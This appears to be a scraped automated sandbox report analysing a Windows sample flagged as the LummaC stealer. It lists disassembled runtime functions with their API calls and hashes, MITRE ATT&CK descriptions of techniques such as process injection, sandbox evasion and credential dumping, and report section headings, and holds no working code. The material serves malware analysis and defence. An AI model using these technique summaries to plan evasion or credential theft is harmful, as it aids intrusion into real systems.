Part of subcall function 0019FAC9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001A12A5,?,00000000,-00000008), ref: 0019FB2A

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001A78B5
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001A78FB
GetLastError.KERNEL32 ref: 001A799E

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 6d083322a2cefb54ea5133bcacaf69e7a5bde7a109aa66ca375782664843ca50
Instruction ID: b5cf226d70f1d1e36621a0ea6fc53fad0c3444e97dc23c694e7489ac1caa4e78
Opcode Fuzzy Hash: 6d083322a2cefb54ea5133bcacaf69e7a5bde7a109aa66ca375782664843ca50
Instruction Fuzzy Hash: 9ED19D79D042489FCF15CFE8C890AAEBBB5FF4A314F24452AE455EB391D730AA42CB50

Function 0019DB1C Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0019DBE3
___AdjustPointer.LIBCMT ref: 0019DC06
___AdjustPointer.LIBCMT ref: 0019DCA2

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: e288ddfc0c6c95a45c9ed1d30c06b89fd299e45d33668e0a26e2a5085ec9c045
Instruction ID: d70577900cbec8afc54de056196ed28abd4218123c28e8dccf24ce4ece52be2b
Opcode Fuzzy Hash: e288ddfc0c6c95a45c9ed1d30c06b89fd299e45d33668e0a26e2a5085ec9c045
Instruction Fuzzy Hash: 8351F376A09202AFEF299F50F841BBAB7B4FF51710F25442DE90697291E771ED80C790

Function 001A5726 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0019FAC9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001A12A5,?,00000000,-00000008), ref: 0019FB2A

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 001A578A
__dosmaperr.LIBCMT ref: 001A5791
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 001A57CB
__dosmaperr.LIBCMT ref: 001A57D2

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: ef7035f6263b3361667f3c46ebe9f480371678863a4b247377e8654e37a0bd3a
Instruction ID: f2f70a62097f2cebee1a20f5d10e6dfb9effe3ee7f3b500b87bdad0f749d110c
Opcode Fuzzy Hash: ef7035f6263b3361667f3c46ebe9f480371678863a4b247377e8654e37a0bd3a
Instruction Fuzzy Hash: 6A21C275608A05EFDF20EFA5DC8082BB7AAEF163647958519FC19A7111E731EC009BA0

Function 00194AA1 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526649727095ab0c15bf0b565b387b41659f6b10cd8ab8a0821f326562a7b1e1
Instruction ID: 9ffef12c48d3c0854f13bc61f3fb389e92d63f43bb039a5bd6f81f39d641ab9c
Opcode Fuzzy Hash: 526649727095ab0c15bf0b565b387b41659f6b10cd8ab8a0821f326562a7b1e1
Instruction Fuzzy Hash: D321DF31600209AFDF20EF79CC40E6BB7A9EF543687118528F92AC7161E731EC0287A0

Function 001A64E6 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 001A64EE

Part of subcall function 0019FAC9: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001A12A5,?,00000000,-00000008), ref: 0019FB2A

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001A6526
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001A6546

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 32dd9a7714b111865e93a67fa331875a86b79853276b59fbbf281cbe42c9f73e
Instruction ID: f692cafa77263fe07c69214ebb22689c5fe0e1643ac50fd3ef449c978885e02e
Opcode Fuzzy Hash: 32dd9a7714b111865e93a67fa331875a86b79853276b59fbbf281cbe42c9f73e
Instruction Fuzzy Hash: 3211C4B5D112157F6B1227B6AC89D7F699CDE673D87180129F805D2105FB60CE0251F0

Function 001AF4A8 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,001ADA5F,00000000,00000001,?,?,?,001A79F2,?,00000000,00000000), ref: 001AF4BF
GetLastError.KERNEL32(?,001ADA5F,00000000,00000001,?,?,?,001A79F2,?,00000000,00000000,?,?,?,001A7338,?), ref: 001AF4CB

Part of subcall function 001AF520: CloseHandle.KERNEL32(FFFFFFFE,001AF4DB,?,001ADA5F,00000000,00000001,?,?,?,001A79F2,?,00000000,00000000,?,?), ref: 001AF530

___initconout.LIBCMT ref: 001AF4DB

Part of subcall function 001AF4FD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001AF499,001ADA4C,?,?,001A79F2,?,00000000,00000000,?), ref: 001AF510

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,001ADA5F,00000000,00000001,?,?,?,001A79F2,?,00000000,00000000,?), ref: 001AF4F0

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: f7dc0060f09a3d6149d1cf28f3a210c05575be4bee763926d3663112c4b45a7e
Instruction ID: a3e3ba795d533b368d3591558370e86cddcee5f13a2ab5f6b07e507c107a74de
Opcode Fuzzy Hash: f7dc0060f09a3d6149d1cf28f3a210c05575be4bee763926d3663112c4b45a7e
Instruction Fuzzy Hash: 57F0C03A501119BBDF225FD9EC0899A3F66FF4E7A1F144264FA1899530D732C8A1DBE0

Function 0018E9A3 Relevance: 6.0, APIs: 4, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,0018E92C,00000064), ref: 0018E9C6
LeaveCriticalSection.KERNEL32(001C0118,?,?,0018E92C,00000064,?,?,0018B8E5,?,00000001,?,?,?,?,?,?), ref: 0018E9D0
WaitForSingleObjectEx.KERNEL32(0018E92C,00000000,?,0018E92C,00000064,?,?,0018B8E5,?,00000001,?,?,?,?,?,?), ref: 0018E9E1
EnterCriticalSection.KERNEL32(001C0118,?,0018E92C,00000064,?,?,0018B8E5,?,00000001,?,?,?,?,?,?,5E6871BB), ref: 0018E9E8

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 6524e1191d85a674bfff2843eb67e77baf03e27d119b970d181e78060a7c8f97
Instruction ID: 1871d1c0acf0b65452708bc1954746ac08abe1d1eb164cc5660eb521d9f65a9e
Opcode Fuzzy Hash: 6524e1191d85a674bfff2843eb67e77baf03e27d119b970d181e78060a7c8f97
Instruction Fuzzy Hash: 15E09231941128FBCB072B90EC0AE99BF54BB18B52B080015F50A6256087B1C9909BE0

Function 0019468D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0019471D

Strings

pow, xrefs: 001946F5, 00194712

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 182502a14dd8444f9667934233d0a1e9665e968a1724737bfe5976345f76af79
Instruction ID: fbbbe9380716e04140dd89dd6581a143720d4cb989872eff94cab64f44772265
Opcode Fuzzy Hash: 182502a14dd8444f9667934233d0a1e9665e968a1724737bfe5976345f76af79
Instruction Fuzzy Hash: C9515B61A08206A7CF1D7B94C941B7A3BA4DB51B51F308E7CE0D5C22B9EF348CD79A46

Function 001A42D6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0019FC1A: GetLastError.KERNEL32(00000000,?,001A1F9D), ref: 0019FC1E
Part of subcall function 0019FC1A: SetLastError.KERNEL32(00000000,?,?,00000028,0019AC4F), ref: 0019FCC0

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,0019839D,?,?,?,00000055,?,-00000050,?,?,?), ref: 001A4395
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,0019839D,?,?,?,00000055,?,-00000050,?,?), ref: 001A43CC

Strings

utf8, xrefs: 001A449E

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: 71b3b01bee7c3d32ec7c21c6d338893ce7713fa9344dd6e5bcd0e82d2a4d9fcc
Instruction ID: d93a3653711f886fa0331aed44e27d0df1c35fc2ece5723520ed0569cd8421a6
Opcode Fuzzy Hash: 71b3b01bee7c3d32ec7c21c6d338893ce7713fa9344dd6e5bcd0e82d2a4d9fcc
Instruction Fuzzy Hash: F851283DA00312ABEB25AB708C42BB773A8FF9B700F154529F589D7181E7F0E94086A1

Function 0019D98C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0019D995

Strings

csm, xrefs: 0019DA28
csm, xrefs: 0019D9B7

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 9dd096ed45c80ddd0a501b6a70fc4b1c9a744c78a7bbcefd9ef2bde475ffb799
Instruction ID: 6adb9e8068d9512571e525b3baa3eb687c8d1a32f468fb7bb8c85cfbda751f59
Opcode Fuzzy Hash: 9dd096ed45c80ddd0a501b6a70fc4b1c9a744c78a7bbcefd9ef2bde475ffb799
Instruction Fuzzy Hash: 5B312232404219EFDF269F94EC419AA7B66FF08359B18865AFD545B121C332CCB2DB82

Function 0017B820 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0017B82B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0017B950

Strings

bad locale name, xrefs: 0017B944

Memory Dump Source

Source File: 00000000.00000002.2414995551.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true

Associated: 00000000.00000002.2414971152.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415032040.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415049553.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415064235.00000000001BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415079434.00000000001C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2415094044.00000000001C7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_170000_1fxm3u0d.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: 384527dde514531a471ccec00f8fc7bbb4a33d8df12fdd645a9dc755a0a0439e
Instruction ID: 0b2d1e01f4af24da3c1fd4ec45b9b255cb5007e68e958201dc0def208c21f84f
Opcode Fuzzy Hash: 384527dde514531a471ccec00f8fc7bbb4a33d8df12fdd645a9dc755a0a0439e
Instruction Fuzzy Hash: 51217C71304B058BD7348E3998D531B76E2EFE8314F24C91CC1A94B744C3B99C08CB92

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1fxm3u0d.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

